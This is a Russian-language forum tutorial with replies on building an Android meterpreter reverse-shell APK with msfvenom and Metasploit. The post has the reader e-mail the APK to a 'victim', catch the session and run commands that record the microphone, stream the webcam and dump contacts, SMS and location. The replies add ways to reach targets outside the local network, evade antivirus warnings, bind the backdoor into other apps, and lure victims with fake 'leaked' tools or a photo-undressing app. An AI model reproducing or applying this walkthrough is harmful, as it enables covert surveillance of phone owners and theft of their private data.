• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

The Codeby

The Codeby

ООО Кодебай
30.12.2015
3 249
4 661
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.
Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой
Код:
root@kali:-# msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
Код:
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Запускается драйвер Payload……..
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Что делать, если вылетает ошибка парсинга:
Код:
Error fixing(incase you get PARSE ERROR)
Для исправления этой ошибки signapk

После чего выполните следующие операции:
  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.
  3. Введите следующую команду java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “в cmd (без двойных кавычек)
  4. Скопируйте на телефон и установите.
  5. Молимся чтобы сработало…
Перевод: Maryana Nazarenko
Источник:
 
Даниил Чистяков

Даниил Чистяков

New member
16.05.2019
1
1
Простите, но я делаю все согласно инструкции, но meterpeter не обращает внимания на мой смартфон, я запускаю программу и код, но ничего не происходит
 
  • Нравится
Реакции: m4dmeds
Н

Неизвестный

а где папка где лежит сделанный апк
 
P

PoLMoRFi

Happy New Year
31.05.2019
10
0
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
 
Sgtron Versio

Sgtron Versio

Member
13.03.2019
23
1
Во первых IP 168.192.ХХ.ХХ должны быть в одной подсети. (инач несработает)
На ведройде должна стоять галочка установка приложений из неизвестных источников.
При передачи по емайлу скорее всего поругается сервис (гугл и майл) посчитает что хотите отправить вирус ))
....
приложение apk может рухнуть и сессия тю-тю. (нужно проверить не всегда срабатывает)
 
  • Нравится
Реакции: PoLMoRFi
Sgtron Versio

Sgtron Versio

Member
13.03.2019
23
1
Не во всех дистрибутивах будут права на запись в эту директорию=папку (если конечно глупо от root работать)
мне нужно явно указывать куда сохранять (где есть права на запись)
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
 
centr

centr

Премиум
31.01.2017
414
410
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Работая с VPS коннект в не локальной сети разумеется реален( так же возможно указать свой внешний ip и тоже будет работать, если не сработает значить проброс порта.), с предупреждениями не много сложней.
 
  • Нравится
Реакции: PoLMoRFi
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 522
3 355
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Да назовите Deeppink - утилита по автораздеванию фото, там за секнуду поставят ;) не обращая внимания на предупреждения ;) Самое главное, когда нет возможности создать красивый apk нужно применять таргетированое СИ - смотреть на тренды в It, в потребности человека и предлогать ему подобное. СЛИВ АНБ, УТИЛИТА ДЛЯ СЛЕЖКИ, ОТ НАС ЭТО СКРЫВАЛИ! ФАЙЛ БУДЕТ ДОСТУПЕН 12 ЧАСОВ ПОТОМ УДАЛЮ ИНАЧЕ МЕНЯ ПОЙМАЮТ! и в том же духе, так и разводят во многих каналах ТГ где общаеют СЛИВЫ, ЧЕРНЫЙ ХАК, ДАРК ХАЙД, АНОНИМНЫЙ КАНАЛ - в 99% это тупо скрытая реклама своих курсов и впаривание файлов с полезной нагрузкой ( 80% скачивают "ПРИВАТНЫЙ" софт под linux - думаю что linux это так безопасно ), а так вместе с красивой программой подгружается в систему модуль , через который может быть как простейший майнинг так и ботнет.
 
PresetX

PresetX

Member
18.01.2018
24
3
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Не в локалке - нужен открытый порт на атакуемом/атакующем устройстве (tcp/reverse_tcp) или сервер, принимающий запросы.
Без предупреждений при установке - убрать некоторые permission, обфусцировать наверное (популярный софт же), или написать программу, получающую доступ к root, и через нее грузить приложение)
 
  • Нравится
Реакции: PoLMoRFi
Krypton 8ch5

Krypton 8ch5

New member
08.10.2019
1
1
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.
 
  • Нравится
Реакции: PoLMoRFi
EnTerFoll

EnTerFoll

New member
14.06.2019
2
0
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.
Но при этом не стоит забывать про открытый порт, который нужно пробросить
 
EnTerFoll

EnTerFoll

New member
14.06.2019
2
0
У меня есть несколько вопросов. Первый - как сделать так, чтобы сессия не умирала(как я понимаю, mainactivity быстро очищается из оперативки) Второй: Я с помощью кода на питоне слил апк бэкдор с апк термукса(просто для примера), но при запуске приложения сессия не открывается. Я конечно не ручаюсь за правильность кода, но вроде он выводит третий апк, когда после декомпиляции сливает манифесты и остальные нужные файлы в один. В итоге получаем, что просто мейн активити палится и сессия подыхает за пару секунд(хотя на моём старом устройстве зачастую держалось до 10-ти минут), а при сливании с другим апк бэкдор даже не работает, устанавливая чистое приложение. Вот это и странно, по идее в манифесте бэкдора прописаны все разрешения, которые запрашиваются при установке, но при установке слитного апк они не выводятся, приложение остаётся чистым. Я ещё не супер знаток питона, мне пришлось этот код десять тысяч раз исправлять, когда я его нашёл в инете, и не факт, что я всё исправил

что делать если сто лет запускается?
У тебя не открывается сессия на твоём IP, мб ты что-то не так ввёл, иши ошибку
 
D

Demi

Mod. Ethical Hacking
Grey Team
16.02.2017
143
130
Не во всех дистрибутивах будут права на запись в эту директорию=папку (если конечно глупо от root работать)
мне нужно явно указывать куда сохранять (где есть права на запись)
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
При выполнении команды, ты по умолчанию находишься в домашнем каталоге, соответственно права на запись у тебя есть, если ты конечно перед этим не переходил куда либо, но это уже как бы работа с системой, надеюсь мангалом не будут пользоваться по типу копи / паст
 
C

ck.

К удалению 21.01.2019
05.10.2017
1
1
СПАСИБИЩЕ! Все по инструкции сработало быстро на старый самсунг ж2. забросил, установил, сессию увидел и по списку все команды пробовать ............ все четко кроме.......... не пойму как в режиме реального времени микро прослушать либо на запись поставить ... а то аудио 0:00 сек несколько раз .. Как бы самая важная функция. Камеру Стримлю в каком то супер зуме тоже ... нихрена не вижу... мож сама труба и камера говно , завтра на другом попробую , но микро одинаковый у всех .. помогите кто знает ?
 
  • Нравится
Реакции: PoLMoRFi
Мы в соцсетях: